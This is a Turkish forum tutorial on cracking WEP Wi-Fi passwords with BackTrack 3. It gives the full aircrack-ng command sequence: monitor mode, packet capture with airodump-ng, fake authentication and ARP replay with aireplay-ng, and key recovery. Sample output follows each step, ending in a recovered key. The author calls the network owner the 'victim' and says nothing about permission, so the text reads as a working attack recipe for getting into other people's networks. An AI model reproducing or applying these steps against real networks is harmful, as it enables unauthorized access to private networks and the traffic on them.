Wireless Şifresi Kırma
Bu döküman Tahribat.Com için yazılmıştır.
Merhabalar, wireless aglarina son dönemde cogalan ilgiden ötürü ve bircok kez crack nasil yapilir sorulari üzerine bu konuya el atmak istedim.
Öncelikle sunu acikliyayim. Spoof ve Crack islemlerinde linux olmazsa olmaz gereksinimlerdendir. Linux`u zor, anlasilmaz sadece elit kisilerin kullanabilecegi görüntüsü bircok kisinin beynine islemis nedense. Bu tabuyu asmaliyiz.
Baslangic icin Wep sifreleme algoritmasina deginmemin sebebi, bu sifreleme sisteminin en kolay kirilmasindan dolayidir. Wpa algoritmasina ileriki asamalarda deginecegim.
Wireless sifre kirmasinin genel mantigi , hedefin mac adresi snifflenir, gidip gelen paketleri toplanilir, yeterli paket elde edildiginde mac adresi kopyalanir ve sifre elde edilir.
Her şeyin kolaylaştığı bu dönemlerde, bu işlemi yapmak için sadece 5 dk bile yeterli olmaktadır. Bu konu üzerine tasarlanmış olan BackTrack 3 linux modu, wireless cracking icin hertürlü yazilimi sunmaktadir.
Crackinge başlamadan önce gereken temel 2 gereksinim var.
1- BackTrack 3
Download adresi: http://remote-exploit.org/cgi-bin/fileget?version=bt3-cd
2- BackTrack 3 ile uyumlu çalışan bir wireless kartı.
Uyumlu kart listesi: http://backtrack.offensive-security.com/index.php?title=HCL:Wireless
A) Ilk olarak BackTrack 3 ü indirin, boot cd olarak cd ye kaydedin. Bilgisayari cd`den baslatin. Sistem tam olarak acilana kadar sürekli enter tusuna basili tutun.
B) Menüden wlan monitöre girin ve cevrenizdeki wep olan wireless noktalarindan sinyali en yüksek olaninin mac adresini kopyalayin.
C) Simdi crack islemine basliyabiliriz. Öncelikle hangi bilgileri kullanacagimizi belirliyelim.
Kendi MAC Adresimiz: |
00:0F:B5:88:AC:82 |
BSSID (Kurbanin MAC Adresi): |
00:14:6C:7E:40:80 |
ESSID (Kurbanin Baglantisinin ismi): |
teddy |
Access point kanali: |
9 |
Wireless arayüzü: |
ath0 |
Bu veriler crack isleminde kullanilmis olan örnek veriler. Bunlari birebir kendi bilgilerinizle degistirmeniz gerekiyor.
#####################################################################
Wireless Şifresi Kırma
A) Simdi sirayla su islemleri yapin.
1- Konsol u baslatin ve sunu yazin.
airmon-ng stop ath0
Suna benzer bir cevap gelmeli
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
2- Simdi sunu yazin
iwconfig
Suna benzer bir cevap gelmeli
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
3- Simdi sunu yazın
airmon-ng start wifi0 9
Suna benzer bir cevap gelmeli
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
4- Tekrardan sunu yazin
iwconfig
Suna benzer bir cevap gelmeli
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Wireless Şifresi Kırma
5- Simdi sunu yazin
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
Suna benzer bir cevap gelmeli
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Konsol penceresini kenara çekin , isleme devam etsin.
Buraya kadar her şey yolunda ise crack işlemini yapmamıza az kaldı.
B) Yeni bir konsol penceresi açın. Sunu yazın
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Söyle bir cevap gelmeli
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
C) Yeni bir konsol penceresi daha açın. Sunu yazın
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Söyle bir cevap gelmeli
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
D) Yeni bir konsol penceresi daha açın. Sunu yazın
aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
Bu noktadan sonra eğer yeterli paket elde edildiyse söyle bir cevap gelecektir.
Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
Eger böyle bir cevap elde edemediyseniz, ayni işlemi daha fazla paket elde ettikten sonra tekrarlayınız. Ne kadar fazla paket elde ettiyseniz , şifrenin kırılması kesinleşecektir.
Kolay Gelsin.